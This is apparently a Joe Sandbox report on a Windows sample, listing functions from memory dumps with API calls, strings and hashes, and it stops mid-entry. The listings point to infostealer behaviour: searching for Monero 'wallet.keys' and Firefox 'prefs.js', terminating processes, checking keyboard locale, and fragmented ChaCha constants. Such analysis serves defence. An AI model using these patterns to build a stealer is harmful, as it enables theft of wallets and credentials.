Function 00D10098 Relevance: 17.4, Strings: 13, Instructions: 1151COMMON

Download Yara Rule

Strings

expand 32-by, xrefs: 00D103C8
nd 3, xrefs: 00D10117
expa, xrefs: 00D10461
2-byexpa, xrefs: 00D10355
te k, xrefs: 00D10347
2-by, xrefs: 00D100F6
te k, xrefs: 00D103B4
expa, xrefs: 00D105BB
te k, xrefs: 00D1053E
expand 3, xrefs: 00D104E5
te knd 3expand 32-by, xrefs: 00D1034E
2-by, xrefs: 00D1036E
nd 32-by, xrefs: 00D104B4

Memory Dump Source

Source File: 00000000.00000002.2091020905.0000000000CFC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true

Associated: 00000000.00000002.2091008439.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000CD1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E0D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000FA6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000000FBA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000123F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000001249000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000001257000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091487386.0000000001258000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091582506.00000000013F3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091595746.00000000013F4000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cd0000_file.jbxd

Yara matches

Similarity

API ID:
String ID: 2-by$2-by$2-byexpa$expa$expa$expand 3$expand 32-by$nd 3$nd 32-by$te k$te k$te k$te knd 3expand 32-by
API String ID: 0-1562099544
Opcode ID: 74786d5e410390c28444d6ffa7d97e47467e62d2f5ff2becfbe19334c29c47cb
Instruction ID: 0bdd837eb7c6166a89cafd7b619f16fd695a98daaf19731710ceaf1ae63141e6
Opcode Fuzzy Hash: 74786d5e410390c28444d6ffa7d97e47467e62d2f5ff2becfbe19334c29c47cb
Instruction Fuzzy Hash: 11E276B09083808FD7A4CF29C580B8BFBE1BFC8354F51892EE99997211D770A959CF56

Function 00CDF7B0 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 275fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00CEAA50: lstrcpy.KERNEL32(00CF0E1A,00000000), ref: 00CEAA98

Part of subcall function 00CEAC30: lstrcpy.KERNEL32(00000000,?), ref: 00CEAC82
Part of subcall function 00CEAC30: lstrcat.KERNEL32(00000000), ref: 00CEAC92

Part of subcall function 00CEACC0: lstrlen.KERNEL32(?,01598830,?,\Monero\wallet.keys,00CF0E1A), ref: 00CEACD5
Part of subcall function 00CEACC0: lstrcpy.KERNEL32(00000000), ref: 00CEAD14
Part of subcall function 00CEACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00CEAD22

Part of subcall function 00CEABB0: lstrcpy.KERNEL32(?,00CF0E1A), ref: 00CEAC15

FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00CF16B0,00CF0D97), ref: 00CDF81E
StrCmpCA.SHLWAPI(?,00CF16B4), ref: 00CDF86F
StrCmpCA.SHLWAPI(?,00CF16B8), ref: 00CDF885
FindNextFileA.KERNEL32(000000FF,?), ref: 00CDFBB1
FindClose.KERNEL32(000000FF), ref: 00CDFBC3

Strings

prefs.js, xrefs: 00CDF912

Memory Dump Source

Source File: 00000000.00000002.2091020905.0000000000CD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true

Associated: 00000000.00000002.2091008439.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000CFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E0D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000FA6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000000FBA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000123F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000001249000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000001257000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091487386.0000000001258000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091582506.00000000013F3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091595746.00000000013F4000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cd0000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
String ID: prefs.js
API String ID: 3334442632-3783873740
Opcode ID: 3b3c806f396ecccd6023a337efa6ff3ebb5d5fd80bc48e324ce7ebd1d7c1895b
Instruction ID: e465a34c55a88e006283a13a3dd551333415d620a72dd046067d1676d49dbec4
Opcode Fuzzy Hash: 3b3c806f396ecccd6023a337efa6ff3ebb5d5fd80bc48e324ce7ebd1d7c1895b
Instruction Fuzzy Hash: 6DB14172A002489FCB24FF65DD96EEE7379AF54300F0085A9E50A56191EF306B49EF92

Function 00CD1710 Relevance: 14.5, APIs: 7, Strings: 1, Instructions: 492fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00CEAA50: lstrcpy.KERNEL32(00CF0E1A,00000000), ref: 00CEAA98

FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00CF523C,?,?,?,00CF52E4,?,?,00000000,?,00000000), ref: 00CD1963
StrCmpCA.SHLWAPI(?,00CF538C), ref: 00CD19B3
StrCmpCA.SHLWAPI(?,00CF5434), ref: 00CD19C9
CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00CD1D80
DeleteFileA.KERNEL32(00000000), ref: 00CD1E0A
FindNextFileA.KERNEL32(000000FF,?), ref: 00CD1E60
FindClose.KERNEL32(000000FF), ref: 00CD1E72

Part of subcall function 00CEAC30: lstrcpy.KERNEL32(00000000,?), ref: 00CEAC82
Part of subcall function 00CEAC30: lstrcat.KERNEL32(00000000), ref: 00CEAC92

Part of subcall function 00CEACC0: lstrlen.KERNEL32(?,01598830,?,\Monero\wallet.keys,00CF0E1A), ref: 00CEACD5
Part of subcall function 00CEACC0: lstrcpy.KERNEL32(00000000), ref: 00CEAD14
Part of subcall function 00CEACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00CEAD22

Part of subcall function 00CEABB0: lstrcpy.KERNEL32(?,00CF0E1A), ref: 00CEAC15

Strings

\*.*, xrefs: 00CD1831

Memory Dump Source

Source File: 00000000.00000002.2091020905.0000000000CD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true

Associated: 00000000.00000002.2091008439.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000CFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E0D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000FA6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000000FBA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000123F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000001249000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000001257000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091487386.0000000001258000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091582506.00000000013F3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091595746.00000000013F4000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cd0000_file.jbxd

Yara matches

Similarity

API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
String ID: \*.*
API String ID: 1415058207-1173974218
Opcode ID: 22ddb0cbbd7f25a50af05f0319d2b03b0942c55e82dca074d9fe055b1a13c34c
Instruction ID: 4c5f5932f67230c1a05f56b45c16c0d67c12cac1466809496d908aab48b43e28
Opcode Fuzzy Hash: 22ddb0cbbd7f25a50af05f0319d2b03b0942c55e82dca074d9fe055b1a13c34c
Instruction Fuzzy Hash: C5121E72910158AFCB15FB61CCA6EEE7379AF64300F4145E9B50A62191EF307B88DF62

Function 00CDDF10 Relevance: 14.4, APIs: 7, Strings: 1, Instructions: 370fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00CEAA50: lstrcpy.KERNEL32(00CF0E1A,00000000), ref: 00CEAA98

Part of subcall function 00CEACC0: lstrlen.KERNEL32(?,01598830,?,\Monero\wallet.keys,00CF0E1A), ref: 00CEACD5
Part of subcall function 00CEACC0: lstrcpy.KERNEL32(00000000), ref: 00CEAD14
Part of subcall function 00CEACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00CEAD22

Part of subcall function 00CEABB0: lstrcpy.KERNEL32(?,00CF0E1A), ref: 00CEAC15

FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00CF0C32), ref: 00CDDF5E
StrCmpCA.SHLWAPI(?,00CF15C0), ref: 00CDDFAE
StrCmpCA.SHLWAPI(?,00CF15C4), ref: 00CDDFC4
FindNextFileA.KERNEL32(000000FF,?), ref: 00CDE4E0
FindClose.KERNEL32(000000FF), ref: 00CDE4F2

Strings

\*.*, xrefs: 00CDDF26

Memory Dump Source

Source File: 00000000.00000002.2091020905.0000000000CD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true

Associated: 00000000.00000002.2091008439.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000CFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E0D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000FA6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000000FBA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000123F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000001249000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000001257000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091487386.0000000001258000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091582506.00000000013F3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091595746.00000000013F4000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cd0000_file.jbxd

Yara matches

Similarity

API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
String ID: \*.*
API String ID: 2325840235-1173974218
Opcode ID: 019a7badc4dbe13ee83116cbd3af6bd2a4adf53d1b8118a361c24bdf185a5588
Instruction ID: d0dfb70e22c34bf17a06cf37335d17d9b464f72cc139291c57f2cb53c1ca56de
Opcode Fuzzy Hash: 019a7badc4dbe13ee83116cbd3af6bd2a4adf53d1b8118a361c24bdf185a5588
Instruction Fuzzy Hash: 00F1CC729141589FCB25FB61CDA6EEE7339BF24300F5145EAA50A62091EF307B88DF52

Function 011267FA Relevance: 14.2, Strings: 10, Instructions: 1693COMMON

Download Yara Rule

Strings

1 |G, xrefs: 011275D2
c?s, xrefs: 01126A94
[jV, xrefs: 01127176
_7, xrefs: 011269F2
EVoW, xrefs: 011268DD
!!w}, xrefs: 01127382
Hm8-, xrefs: 011273FE
K\., xrefs: 01126C45
BP:, xrefs: 011279E9
63{], xrefs: 01127182

Memory Dump Source

Source File: 00000000.00000002.2091277826.0000000000FBA000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true

Associated: 00000000.00000002.2091008439.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000CD1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000CFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E0D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000FA6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000123F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000001249000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000001257000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091487386.0000000001258000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091582506.00000000013F3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091595746.00000000013F4000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cd0000_file.jbxd

Yara matches

Similarity

API ID:
String ID: !!w}$1 |G$63{]$BP:$EVoW$Hm8-$K\.$[jV$_7$c?s
API String ID: 0-1415483498
Opcode ID: 62379f660c1bd35f639156f29dbaec0a0c5022a44969c3ec10a13140eaae0901
Instruction ID: edbac9d271f32005c690c4577fff252cc68a5060104de88c1cc1aebfedeeb934
Opcode Fuzzy Hash: 62379f660c1bd35f639156f29dbaec0a0c5022a44969c3ec10a13140eaae0901
Instruction Fuzzy Hash: 5DB25AF3A0C2149FE3046E2DEC8567AFBD9EF94720F1A463DEAC4C7744EA3558058692

Function 00CDDB80 Relevance: 13.8, APIs: 9, Instructions: 255fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00CEAA50: lstrcpy.KERNEL32(00CF0E1A,00000000), ref: 00CEAA98

Part of subcall function 00CEAC30: lstrcpy.KERNEL32(00000000,?), ref: 00CEAC82
Part of subcall function 00CEAC30: lstrcat.KERNEL32(00000000), ref: 00CEAC92

Part of subcall function 00CEACC0: lstrlen.KERNEL32(?,01598830,?,\Monero\wallet.keys,00CF0E1A), ref: 00CEACD5
Part of subcall function 00CEACC0: lstrcpy.KERNEL32(00000000), ref: 00CEAD14
Part of subcall function 00CEACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00CEAD22

Part of subcall function 00CEABB0: lstrcpy.KERNEL32(?,00CF0E1A), ref: 00CEAC15

FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00CF15A8,00CF0BAF), ref: 00CDDBEB
StrCmpCA.SHLWAPI(?,00CF15AC), ref: 00CDDC33
StrCmpCA.SHLWAPI(?,00CF15B0), ref: 00CDDC49
FindNextFileA.KERNEL32(000000FF,?), ref: 00CDDECC
FindClose.KERNEL32(000000FF), ref: 00CDDEDE

Memory Dump Source

Source File: 00000000.00000002.2091020905.0000000000CD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true

Associated: 00000000.00000002.2091008439.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000CFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E0D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000FA6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000000FBA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000123F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000001249000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000001257000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091487386.0000000001258000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091582506.00000000013F3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091595746.00000000013F4000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cd0000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
String ID:
API String ID: 3334442632-0
Opcode ID: df7f9ae1cc638b2040e5492f8dce5c3a22ef64a5866379936abedf56585412f5
Instruction ID: f0e8ffa81c49528e1b2779b11a923f5ca93ec1e1aa7a0d7cc4ee27f675d24c78
Opcode Fuzzy Hash: df7f9ae1cc638b2040e5492f8dce5c3a22ef64a5866379936abedf56585412f5
Instruction Fuzzy Hash: FA915472A102489FCB14FBB1ED96DED737DAF94300F014669F90756181EE34AB08EB92

Function 00CE98E0 Relevance: 12.1, APIs: 8, Instructions: 55processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00CE9905
Process32First.KERNEL32(00CD9FDE,00000128), ref: 00CE9919
Process32Next.KERNEL32(00CD9FDE,00000128), ref: 00CE992E
StrCmpCA.SHLWAPI(?,00CD9FDE), ref: 00CE9943
OpenProcess.KERNEL32(00000001,00000000,?), ref: 00CE995C
TerminateProcess.KERNEL32(00000000,00000000), ref: 00CE997A
CloseHandle.KERNEL32(00000000), ref: 00CE9987
CloseHandle.KERNEL32(00CD9FDE), ref: 00CE9993

Memory Dump Source

Source File: 00000000.00000002.2091020905.0000000000CD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true

Associated: 00000000.00000002.2091008439.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000CFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E0D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000FA6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000000FBA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000123F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000001249000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000001257000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091487386.0000000001258000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091582506.00000000013F3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091595746.00000000013F4000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cd0000_file.jbxd

Yara matches

Similarity

API ID: CloseHandleProcessProcess32$CreateFirstNextOpenSnapshotTerminateToolhelp32
String ID:
API String ID: 2696918072-0
Opcode ID: 181aa675dcd041d6cc5fd5f3825d5664cb59cc11219993519bc1e55a60794d84
Instruction ID: 20dc6a91c0d9642edc1f8f6ed83876b1fd15e4cff1881f7a9ac18541ac1cca58
Opcode Fuzzy Hash: 181aa675dcd041d6cc5fd5f3825d5664cb59cc11219993519bc1e55a60794d84
Instruction Fuzzy Hash: 8F11ECB5A04318ABDB24EFA5DC48FDDB7B9EB49701F00458CF509A6250DB749B84DF90

Function 01128337 Relevance: 11.6, Strings: 8, Instructions: 1614COMMON

Download Yara Rule

Strings

g>, xrefs: 011294B6
D0iw, xrefs: 01129077
=?m?, xrefs: 011289C6
d}, xrefs: 011291FB
d}, xrefs: 0112922A
6Vn, xrefs: 01128C16
'd~, xrefs: 01128F80
f+/`, xrefs: 0112930C

Memory Dump Source

Source File: 00000000.00000002.2091277826.0000000000FBA000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true

Associated: 00000000.00000002.2091008439.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000CD1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000CFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E0D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000FA6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000123F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000001249000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000001257000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091487386.0000000001258000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091582506.00000000013F3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091595746.00000000013F4000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cd0000_file.jbxd

Yara matches

Similarity

API ID:
String ID: 'd~$6Vn$=?m?$D0iw$d}$d}$f+/`$g>
API String ID: 0-2495779603
Opcode ID: 2be8dac1c836cfca1c5705c942c3c13a4d13f0ed6f9a4d29f396927ac0a01ab5
Instruction ID: 517aa317037f27ecad1787afe8391510a7089935714b221006905d2f970bb31d
Opcode Fuzzy Hash: 2be8dac1c836cfca1c5705c942c3c13a4d13f0ed6f9a4d29f396927ac0a01ab5
Instruction Fuzzy Hash: 4BB217F3A0C204AFE3046E29EC8567AFBE5EF94320F1A453DEAC5C3744EA3558458697

Function 00CE7D20 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00CEAA50: lstrcpy.KERNEL32(00CF0E1A,00000000), ref: 00CEAA98

GetKeyboardLayoutList.USER32(00000000,00000000,00CF05B7), ref: 00CE7D71
LocalAlloc.KERNEL32(00000040,?), ref: 00CE7D89
GetKeyboardLayoutList.USER32(?,00000000), ref: 00CE7D9D
GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00CE7DF2
LocalFree.KERNEL32(00000000), ref: 00CE7EB2

Strings

/ , xrefs: 00CE7E0F

Memory Dump Source

Source File: 00000000.00000002.2091020905.0000000000CD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true

Associated: 00000000.00000002.2091008439.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000CFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E0D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000FA6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000000FBA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000123F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000001249000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000001257000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091487386.0000000001258000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091582506.00000000013F3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091595746.00000000013F4000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cd0000_file.jbxd

Yara matches

Similarity

API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
String ID: /
API String ID: 3090951853-4001269591
Opcode ID: 95a261256444ea919e5738ace19887a29ee4583356e4caab010bcf50eb47226b
Instruction ID: e181436f734f4f35ac6e7723ca2ec26c8fe756ae0252577acede78c5c780b221
Opcode Fuzzy Hash: 95a261256444ea919e5738ace19887a29ee4583356e4caab010bcf50eb47226b
Instruction Fuzzy Hash: 38414B71940258AFCB24DB95DC99FEEB378FB54700F2042D9E00A62291DB742F84DFA1

Function 00CDE530 Relevance: 9.3, APIs: 4, Strings: 1, Instructions: 514fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00CEAA50: lstrcpy.KERNEL32(00CF0E1A,00000000), ref: 00CEAA98

Part of subcall function 00CEAC30: lstrcpy.KERNEL32(00000000,?), ref: 00CEAC82
Part of subcall function 00CEAC30: lstrcat.KERNEL32(00000000), ref: 00CEAC92

Part of subcall function 00CEACC0: lstrlen.KERNEL32(?,01598830,?,\Monero\wallet.keys,00CF0E1A), ref: 00CEACD5
Part of subcall function 00CEACC0: lstrcpy.KERNEL32(00000000), ref: 00CEAD14
Part of subcall function 00CEACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00CEAD22

Part of subcall function 00CEABB0: lstrcpy.KERNEL32(?,00CF0E1A), ref: 00CEAC15

FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,00CF0D79), ref: 00CDE5A2
StrCmpCA.SHLWAPI(?,00CF15F0), ref: 00CDE5F2
StrCmpCA.SHLWAPI(?,00CF15F4), ref: 00CDE608
FindNextFileA.KERNEL32(000000FF,?), ref: 00CDECDF

Strings

\*.*, xrefs: 00CDE54D

Memory Dump Source

